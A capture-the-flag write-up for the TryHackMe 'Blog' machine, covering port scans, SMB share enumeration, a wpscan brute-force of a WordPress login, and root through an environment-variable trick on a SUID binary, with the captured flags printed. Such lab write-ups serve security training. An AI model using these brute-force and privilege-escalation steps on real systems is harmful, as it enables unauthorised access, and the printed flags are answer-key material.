Blog

Lab Setup

mkdir ~/Documents/TryHackMe/eJPT/Blog
cd ~/Documents/TryHackMe/eJPT/Blog
mkdir recon enumeration notes
touch notes/{README.md,vulns,creds}

export IP=10.10.245.192
export URL=http://$IP

Enumeration

To set up a domain for the room, the author recommends adding "blog.thm" to the /etc/hosts file. This step is crucial for creating a designated domain for the machine.

To begin, perform a comprehensive scan of the machine's open ports using both rustscan and nmap. This dual approach ensures a thorough examination of the network, providing a more detailed understanding of the available services and potential vulnerabilities.

  • nmap

nmap -Pn -p- -v -T4 --max-retries 5 $IP -oN recon/nmap.init;
cat recon/nmap.init | grep '/.*open'| cut -d '/' -f 1| tr '\n' ', '| sed 's/.$//g' > recon/ports;
sudo nmap -Pn -sS -sV -n -v -A -T4 -p $(cat recon/ports) $IP -oN recon/nmap.alltcp
  • rustscan

rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.init

Before to access the website I try to get some info about shares using enum4linux tool.

enum4linux $IP
smbclient -N //$IP/BillySMB

I downloaded three files, but they didn't contain useful information. Now, I'm moving on to check the website to see if there's anything there that could help.

We already found a user so I use wpscan to brute force and get password for this user. After minutes of waiting I got nothing so I enumerate for users and I found another user -> kwheel

wpscan --url http://blog.thm/wp-login.php/ --passwords ~/Documents/rockyou.txt --usernames kwheel

Found the password for kwheel user

Exploitation

In the room description, there's a crucial clue pointing to a specific CVE that we need to leverage. This information is key to advancing in the challenge.

There are 2 methods to do this machine. We can use a script or metasploit framework.

I get access on the machine and after a lot of enumeration I found a file with suid tag -> /usr/sbin/checker

Let's download the file and employ reverse engineering tools and techniques to understand its functionality.

Upon examining the source code, it appears that setting the environment variable "admin" to 0 will grant root privileges when the code is executed. To proceed, simply set the "admin" variable to 0 before running the code. This should elevate the privileges as intended.

www-data@blog:/usr/sbin$ ./checker      
./checker
Not an Admin
www-data@blog:/usr/sbin$ export admin='0'
export admin='0'
www-data@blog:/usr/sbin$ ./checker
./checker
root@blog:/usr/sbin# whoami
whoami
root
root@blog:/usr/sbin# cd /media 
cd /media 
root@blog:/media# cd usb
cd usb
root@blog:/media/usb# ls
ls
user.txt
root@blog:/media/usb# cat user.txt
cat user.txt
c8421899aae571f7af486492b71a8ab7
root@blog:/media/usb# cd /root
cd /root
root@blog:/root# ls
ls
root.txt
root@blog:/root# cat root.txt
cat root.txt
9a0b2b618bef9bfa7ac28c1353d9f318
root@blog:/root#

Last updated